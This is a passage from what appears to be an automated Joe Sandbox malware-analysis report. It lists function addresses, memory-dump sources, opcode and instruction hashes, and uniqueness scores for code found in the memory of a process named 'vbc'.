                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 15806ba4830d577c5216450383619cd1924961de3184d54ed8522ce153aff4ff
                                                                                                    • Instruction ID: 5d405c3a0bf95c44a989ef876f7302ea5f00ce750e0ca8b85d0aebbd6060ba52
                                                                                                    • Opcode Fuzzy Hash: 15806ba4830d577c5216450383619cd1924961de3184d54ed8522ce153aff4ff
                                                                                                    • Instruction Fuzzy Hash: E2419E34A05255DFCB10CF99C49199EBBF2AF49300F2A849EE456ABB55CB31EC02CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054D818 Relevance: .1, Instructions: 118COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dde43d09b5fcc89eedff732616ee257d027be7b48f0b034bd3aa3ad44eb9e8a7
                                                                                                    • Instruction ID: 3bf5ceef1c2829371895fc0df244a51504d5bdec2683014f1a1154ed3075b03e
                                                                                                    • Opcode Fuzzy Hash: dde43d09b5fcc89eedff732616ee257d027be7b48f0b034bd3aa3ad44eb9e8a7
                                                                                                    • Instruction Fuzzy Hash: 8331AE317002049FCB059F65DC98D9ABFB2FF88314B158479EA0AAB361CB719C06DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F4378 Relevance: .1, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fc771532be176471e0b128adb158dd941662ee04390f1cb52b7e036e475edcd7
                                                                                                    • Instruction ID: 06da83ce445760b7ac7d626e8bc3e056e5255ec4b95acdf8acda5a1c09f44595
                                                                                                    • Opcode Fuzzy Hash: fc771532be176471e0b128adb158dd941662ee04390f1cb52b7e036e475edcd7
                                                                                                    • Instruction Fuzzy Hash: 8831E3307046088BC714DB65C8A0ABF77A2DFC5300F24852ED516A7781CF396C0687A6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9BC8 Relevance: .1, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fbbf6ba3b2e78387042fad718ce330409a52c9fe6c78e8dfb26aa4b172426b81
                                                                                                    • Instruction ID: c1ab1598ae24fb1cb484d79e34ce5dee3d8ebe2db49e16624f3f25420aba3f85
                                                                                                    • Opcode Fuzzy Hash: fbbf6ba3b2e78387042fad718ce330409a52c9fe6c78e8dfb26aa4b172426b81
                                                                                                    • Instruction Fuzzy Hash: A03167303046985F8719AA2698A0A7E7BD6EFC1714710803FE61ADB740CF349D0687D6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005298B8 Relevance: .1, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f24de776628ceb62f1737082dee49d88da7aafeaec715b380794ad029324bb20
                                                                                                    • Instruction ID: fe54dc58334d1d126f5193608184b1aff3a66aebfca0c0be7a7c3355305e799c
                                                                                                    • Opcode Fuzzy Hash: f24de776628ceb62f1737082dee49d88da7aafeaec715b380794ad029324bb20
                                                                                                    • Instruction Fuzzy Hash: CB419430B04118DFDB15EF64E8909AEBBF6BF8A300F148429E506A7394CB309C44DBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005454B0 Relevance: .1, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1e95dfcf8a8361b1c45b9b81b5c8c7b1b373e6ca7a381abf1920fb866fd51f7b
                                                                                                    • Instruction ID: c20d8c83c66164b3cf749050a2ebbe026e118e92b8a3801761a85a1d3f25fb4c
                                                                                                    • Opcode Fuzzy Hash: 1e95dfcf8a8361b1c45b9b81b5c8c7b1b373e6ca7a381abf1920fb866fd51f7b
                                                                                                    • Instruction Fuzzy Hash: EB418A35A006158FDB14DF65C884AFEBBB2FF88309F20852AD902E7261EB34DD55CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5320 Relevance: .1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e5abc4824a35a9cbfc505fb888e377d74c34e2609b7673c4b4b11b94fc8668e9
                                                                                                    • Instruction ID: 71cc0fe9fa5b63e9b146314349e025bb9efd2e99902b808369755a61d68eca99
                                                                                                    • Opcode Fuzzy Hash: e5abc4824a35a9cbfc505fb888e377d74c34e2609b7673c4b4b11b94fc8668e9
                                                                                                    • Instruction Fuzzy Hash: 4131363220CB489FC321DB699C40A7B7BF5EB81340F14456BEB46C7A91C674A8058B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362E90 Relevance: .1, Instructions: 101COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 32d3520cad1bd36ab68e888943f2a445bddf2e8ac839fd2ff4b99969b4f00132
                                                                                                    • Instruction ID: ab7ca674674dccf29577950632cefd26ce1a1ac1f3d87fc412cced66c7e4b5b6
                                                                                                    • Opcode Fuzzy Hash: 32d3520cad1bd36ab68e888943f2a445bddf2e8ac839fd2ff4b99969b4f00132
                                                                                                    • Instruction Fuzzy Hash: 10413D34E01215DFCB14DF99C58199EBBF6EB89300F2A846DE856ABB14CB31EC418B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052A2D0 Relevance: .1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 071776919b16d0765de65762cdfb42c62e509e8c6f2e7c9918a4e9ba9ccd9464
                                                                                                    • Instruction ID: 15544c2b49c0028cddcb396f9319db4d313080636f2b8b06a369e6364ff84e8b
                                                                                                    • Opcode Fuzzy Hash: 071776919b16d0765de65762cdfb42c62e509e8c6f2e7c9918a4e9ba9ccd9464
                                                                                                    • Instruction Fuzzy Hash: A9314634B042189FCB04DF98D884AAE7BF6FF9D344B2084A5E505DB3A0D770ED419BA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265B70 Relevance: .1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 717a9a71607f86a335aef97d7d6903157954e2f99c0740c2248cce0d166bb070
                                                                                                    • Instruction ID: c30e0a3c7b03e2bda9c898335989b5b2d6a5d6de780431dc3d8125f2bbe0bf68
                                                                                                    • Opcode Fuzzy Hash: 717a9a71607f86a335aef97d7d6903157954e2f99c0740c2248cce0d166bb070
                                                                                                    • Instruction Fuzzy Hash: DD315034714628CFDB04EF54D894AAE77B6FB88304F1044A9E502EB3A9DB759D11CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FABD8 Relevance: .1, Instructions: 93COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: db067e48cd08a3dff4375124677394209510069d024f79da06a9f73cd837c797
                                                                                                    • Instruction ID: 7aa5f45fbd5dfa8b5dd3d306a6bbcc599b6835b0fed8ab6ecdac0b1afabfb60f
                                                                                                    • Opcode Fuzzy Hash: db067e48cd08a3dff4375124677394209510069d024f79da06a9f73cd837c797
                                                                                                    • Instruction Fuzzy Hash: F13162B0A0415CDFDB04DB94C854AFE77B9AB49300F24802AE606AB394CB399D51DBA6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054F188 Relevance: .1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 345f7393cc557e413493a3f92bac343bc1ffa43ebce1d67c565cea6de9cba5a1
                                                                                                    • Instruction ID: 6ade7a4ccf1d0a4546e50fa1ff15817278c762fd783634fbbe684f7c00df9bbe
                                                                                                    • Opcode Fuzzy Hash: 345f7393cc557e413493a3f92bac343bc1ffa43ebce1d67c565cea6de9cba5a1
                                                                                                    • Instruction Fuzzy Hash: 872192363086108FD724DB6DF8946AABBE6EBC0329B15C57AD50EC7252DB71EC068790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00540C4D Relevance: .1, Instructions: 91COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 99166714b40b6379e459571cc4995e2ff09ecf63a936d8b95d3f77b5a0e81aa3
                                                                                                    • Instruction ID: 100bee18d0d1b8c8731cdffc402d1528c8ff75f079286eb4f13d9613ccc2d4ba
                                                                                                    • Opcode Fuzzy Hash: 99166714b40b6379e459571cc4995e2ff09ecf63a936d8b95d3f77b5a0e81aa3
                                                                                                    • Instruction Fuzzy Hash: 6EF0B43528D2DCAFCB13CE649C948EA7F35EE8722471884ABEC41DB593C1758C0AD7A1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004CE710 Relevance: .1, Instructions: 84COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604505551.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4c0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1280e4db0a8a36d9d980108e7d929899b283675f72fdcebf7da6d01d15494316
                                                                                                    • Instruction ID: ece5b38945ac38c94c5fad60f2ebfdef8c50f5ea84cffb93767f9f8a51608769
                                                                                                    • Opcode Fuzzy Hash: 1280e4db0a8a36d9d980108e7d929899b283675f72fdcebf7da6d01d15494316
                                                                                                    • Instruction Fuzzy Hash: BB11792960E7C15FC72347761C64A6A7F61AE93220B1E81EBD881CB2A3D6194C0AC363
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052C3F0 Relevance: .1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 36d16b4c35c5d6183b8eb63db2e450060c39b522f5e79c0b70152b2242db8789
                                                                                                    • Instruction ID: f4e5aea6dda4d0e1f1d184555fa5a1e0c41aa8b99fa293a3a279c1c1a9ba8c66
                                                                                                    • Opcode Fuzzy Hash: 36d16b4c35c5d6183b8eb63db2e450060c39b522f5e79c0b70152b2242db8789
                                                                                                    • Instruction Fuzzy Hash: DB21D3717041218BDB147659A42177F3E9BAFD53A2F34843AA506C72C6DB348C0257E5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265B60 Relevance: .1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 46b05d790c78dfaeaaadd2be7bb720e50962839573ac12228d0e7d6ea8ba416b
                                                                                                    • Instruction ID: 23eadf29ed849e14467e1fb5b67bd441e92061c518859d59591b41811c2cc225
                                                                                                    • Opcode Fuzzy Hash: 46b05d790c78dfaeaaadd2be7bb720e50962839573ac12228d0e7d6ea8ba416b
                                                                                                    • Instruction Fuzzy Hash: 72318F34714628CFDB05EF64D854AAE7BB2FB88304F1040A9E512EB3A9DB749C11DF95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362652 Relevance: .1, Instructions: 82COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 98588000cddea9570668a5365ae000e1631f3a7562128b17ead8a136c6e50e10
                                                                                                    • Instruction ID: 37d19e6d6ee80278aa2e8120aa0e8970627891202490f5ee45189d46e625cfa6
                                                                                                    • Opcode Fuzzy Hash: 98588000cddea9570668a5365ae000e1631f3a7562128b17ead8a136c6e50e10
                                                                                                    • Instruction Fuzzy Hash: 47318F31E00246CFCB14DF59C5169AEBBF6AB89304F16C0A9D466BB715CB70EC45CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04362460 Relevance: .1, Instructions: 78COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608377436.0000000004360000.00000040.00000800.00020000.00000000.sdmp, Offset: 04360000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4360000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1c71e732e0780bfa3c83677419edb824c806b853ec008127fa2bdc89ec6d4614
                                                                                                    • Instruction ID: b52369337c27d196c8493bb54078f5895e8b433f87b5e21ac7b77e8bda499748
                                                                                                    • Opcode Fuzzy Hash: 1c71e732e0780bfa3c83677419edb824c806b853ec008127fa2bdc89ec6d4614
                                                                                                    • Instruction Fuzzy Hash: 5921D1B1E006448FCB24DB94C52599EBBF29B8A310F16809AD056BB662D730EC45CF51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FF90A Relevance: .1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 828aae7bcb3eb647e726cf074a5c1b29653b14c787d5b27385c7736d030a273c
                                                                                                    • Instruction ID: b2179b8128dc76a5bf098931962e3c060212aefdb11c9f9ea52ffa16dd9a3d70
                                                                                                    • Opcode Fuzzy Hash: 828aae7bcb3eb647e726cf074a5c1b29653b14c787d5b27385c7736d030a273c
                                                                                                    • Instruction Fuzzy Hash: 38314D34A1010DEFDB10EF60E895AAE77B6EF94350F108036F902E73A4CB389945DB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00548330 Relevance: .1, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a7981b86affc9ebcd09677e155eb65043ea5c16d939db09068d25aee13cd7a94
                                                                                                    • Instruction ID: 9479d3bfd73215421f76e8cf45cc5dd82587e508d00e4f4223ca30231dc48b90
                                                                                                    • Opcode Fuzzy Hash: a7981b86affc9ebcd09677e155eb65043ea5c16d939db09068d25aee13cd7a94
                                                                                                    • Instruction Fuzzy Hash: FD2148703041459FDB11CF2ACC80AAE7BEABF8AB08B1984A5FD54CB361DA31DC51DB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00548322 Relevance: .1, Instructions: 74COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c647e18871ee0c3e7082f174ab71d1e3cdd6a7f9d3a2cfe7f9be6705bb1bd128
                                                                                                    • Instruction ID: 2be32edc0fb5ac5eb76f998a1faec2f92b2bb9c9c51d37d705bf00337ae55313
                                                                                                    • Opcode Fuzzy Hash: c647e18871ee0c3e7082f174ab71d1e3cdd6a7f9d3a2cfe7f9be6705bb1bd128
                                                                                                    • Instruction Fuzzy Hash: 962168757041849FDB11CF2ACC80AAE3BEABF8A708B1984A5FD45CB361DA31DC41DB20
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5498 Relevance: .1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e115b6a8a2cd54ca7fa17a396d34504395e9d57f2533ffe3c24382a82cc6859e
                                                                                                    • Instruction ID: c1d833d9daccfef5cabd1bafdd5657cf715c0ffb6df05baafe85af2d74a6fdc9
                                                                                                    • Opcode Fuzzy Hash: e115b6a8a2cd54ca7fa17a396d34504395e9d57f2533ffe3c24382a82cc6859e
                                                                                                    • Instruction Fuzzy Hash: 6F21733220465CAFCB029F50DC40A7F7B76EB85300F04802AF75693259C7389C01A7A9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054474D Relevance: .1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7f00f6bcb0f1d71725655441010141191032736cab91319ab207be1215bb6e12
                                                                                                    • Instruction ID: 7e421dc02bf145402d80b71b8683bd26576d3c83d33e4ed9c97262169abd25ac
                                                                                                    • Opcode Fuzzy Hash: 7f00f6bcb0f1d71725655441010141191032736cab91319ab207be1215bb6e12
                                                                                                    • Instruction Fuzzy Hash: CC31B478B422489FDB04CFA4E584AADBBB2FF89304F158155E901EB361DB30AD46DF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054ED0A Relevance: .1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 27c91aec649c0d386b141fc4bebac8c4fb6158b44117ce1186a6d657226d0c55
                                                                                                    • Instruction ID: 311fcd04c9d2c24e0a30c023854894158b4f8adac9bb4a27de1fa63fb3f18774
                                                                                                    • Opcode Fuzzy Hash: 27c91aec649c0d386b141fc4bebac8c4fb6158b44117ce1186a6d657226d0c55
                                                                                                    • Instruction Fuzzy Hash: E91193327042004FD7149B29ECD496ABFAABFE5324718847EE906CB362CE75CC06D790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9535 Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 67a17973cea48c47fd82bb0ca91e3aca3dbc080005305c5597a1471788f8f1dd
                                                                                                    • Instruction ID: a469bd914316e851b2f7a3a2bb5c775e56f5270dee9005f8a72cb4310bb35905
                                                                                                    • Opcode Fuzzy Hash: 67a17973cea48c47fd82bb0ca91e3aca3dbc080005305c5597a1471788f8f1dd
                                                                                                    • Instruction Fuzzy Hash: 50D0928115E7C81FC3138B648DB52D9BF20AE93108B5A06DBC4D9864A3CA191A2AD756
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054C988 Relevance: .1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 021d10b4488dd31429e7c3669bd4f1a0367bb26264129e6bd264e2d4c8ba5dbc
                                                                                                    • Instruction ID: 9a7b74f752d0febd9350378cd51348941d88c5f355d82184bfd2319145082aba
                                                                                                    • Opcode Fuzzy Hash: 021d10b4488dd31429e7c3669bd4f1a0367bb26264129e6bd264e2d4c8ba5dbc
                                                                                                    • Instruction Fuzzy Hash: D1210431A002198FDB18DFA4C954ADDBBF2FF8C304F2045A4E405AB3A1CB36AD45CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054D6A8 Relevance: .1, Instructions: 68COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1ab1c24c3c5bdb183d485427fa6536cd18cbaa043db7f6585ea62f990ccec80
                                                                                                    • Instruction ID: 2a13d2fbca5690754eed947c9e20b48f563b02a8dda55f4d3f6cbdeb3e37ca0b
                                                                                                    • Opcode Fuzzy Hash: f1ab1c24c3c5bdb183d485427fa6536cd18cbaa043db7f6585ea62f990ccec80
                                                                                                    • Instruction Fuzzy Hash: 2F212331904A15DFCB05DF58D480AA9FFB2FF44348F16C16AC44A97242D330BC52CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005478D1 Relevance: .1, Instructions: 65COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9c58c0bb4cf4e7a790fe2194505678a11a00e85af386255295bc2f0dbe1b7083
                                                                                                    • Instruction ID: fbe756ac6a201de584f090a172fefac3e96484967f2e1983f0f4c9089ae1de4c
                                                                                                    • Opcode Fuzzy Hash: 9c58c0bb4cf4e7a790fe2194505678a11a00e85af386255295bc2f0dbe1b7083
                                                                                                    • Instruction Fuzzy Hash: 8411F39684EBD22FC7138B385C61295BF306B27698F5E05DBC8C48B1E3D218186DC3A3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005250C8 Relevance: .1, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
